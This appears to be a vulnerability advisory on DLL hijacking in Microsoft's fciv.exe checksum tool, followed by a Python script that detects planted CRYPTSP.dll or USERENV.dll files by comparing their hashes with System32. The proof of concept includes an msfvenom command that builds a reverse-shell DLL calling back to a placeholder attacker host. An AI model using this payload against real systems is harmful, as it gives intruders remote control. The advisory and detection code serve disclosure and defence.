
File Checksum Integrity Verifier (fciv.exe) - DLL Hijacking
fciv.exe will load and execute malicious Dynamic Link Libraries (DLLs) when a DLL with one of the following vulnerable names is present:
CRYPTSP.dll
USERENV.dll
Exploitation consists of placing a crafted DLL with one of these names in the same directory as fciv.exe.
So if an attacker is able to write one of these vulnerable DLLs into that directory, running the file verification tool will load the malicious DLL directly.
POC
- Generate a reverse shell TCP payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll
- Place the DLL file in the same directory as the fciv executable.
- Execute fciv.exe with the malicious DLL file present:
fciv.exe CRYPTSP.dll
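A defender-side check for the hijack described above and exercised by the POC, added here as an example and not part of the advisory: it scans the directory holding fciv.exe for the two DLL names listed, which a clean install never carries beside the executable (they belong in System32), and compares any hit against the System32 copy by SHA-256 so a planted file shows up as "shadowing". The directory layout built by build_sample_layout is a constructed fixture with stand-in bytes, not real binaries; audit_exe_dir and the verdict strings are names chosen for this example.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# DLL names the advisory lists as hijackable when placed beside fciv.exe
HIJACKABLE_DLLS = ("CRYPTSP.dll", "USERENV.dll")


def sha256_of(path):
    """SHA-256 hex digest of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_exe_dir(exe_dir, system32=None, dll_names=HIJACKABLE_DLLS):
    """Map each hijackable DLL found beside the executable to a verdict.

    Windows resolves a DLL from the application's own directory before
    System32, so a CRYPTSP.dll or USERENV.dll next to fciv.exe shadows the
    genuine one. A clean install has none of these files there, so any hit
    is worth investigating. Verdicts (names chosen for this example):
      'shadowing'      - a System32 copy exists and its hash differs
      'identical-copy' - byte-identical to the System32 copy
      'present'        - no reference copy available to compare against
    """
    exe_dir = Path(exe_dir)
    if system32 is None:
        # Default to the live System32 of the host this runs on
        system32 = Path(os.environ.get("SystemRoot", r"C:\Windows")) / "System32"
    system32 = Path(system32)
    # NTFS is case-insensitive, so match names without regard to case
    wanted = {n.lower(): n for n in dll_names}
    verdicts = {}
    for entry in exe_dir.iterdir():
        if not entry.is_file() or entry.name.lower() not in wanted:
            continue
        ref = system32 / wanted[entry.name.lower()]
        if ref.is_file():
            same = sha256_of(entry) == sha256_of(ref)
            verdicts[entry.name] = "identical-copy" if same else "shadowing"
        else:
            verdicts[entry.name] = "present"
    return verdicts


def build_sample_layout(root=None):
    """Constructed fixture, not a real install: an 'fciv' directory holding a
    stand-in fciv.exe plus a planted CRYPTSP.dll, and a stand-in System32
    holding a different CRYPTSP.dll. Returns (exe_dir, system32) as Paths."""
    root = Path(tempfile.mkdtemp() if root is None else root)
    exe_dir = root / "fciv"
    sys32 = root / "System32"
    exe_dir.mkdir()
    sys32.mkdir()
    (exe_dir / "fciv.exe").write_bytes(b"MZ stand-in executable")
    (exe_dir / "CRYPTSP.dll").write_bytes(b"MZ planted dll (constructed)")
    (sys32 / "CRYPTSP.dll").write_bytes(b"MZ genuine dll (constructed)")
    return exe_dir, sys32


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        exe_dir, sys32 = build_sample_layout(tmp)
        for name, verdict in audit_exe_dir(exe_dir, sys32).items():
            print(f"{exe_dir / name}: {verdict}")
```

On a real host, call audit_exe_dir with the directory fciv.exe actually lives in and leave system32 at its default; a "shadowing" verdict is the planted-DLL case from the advisory, and the file's Authenticode signature and creation time are the next things to look at.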
Reference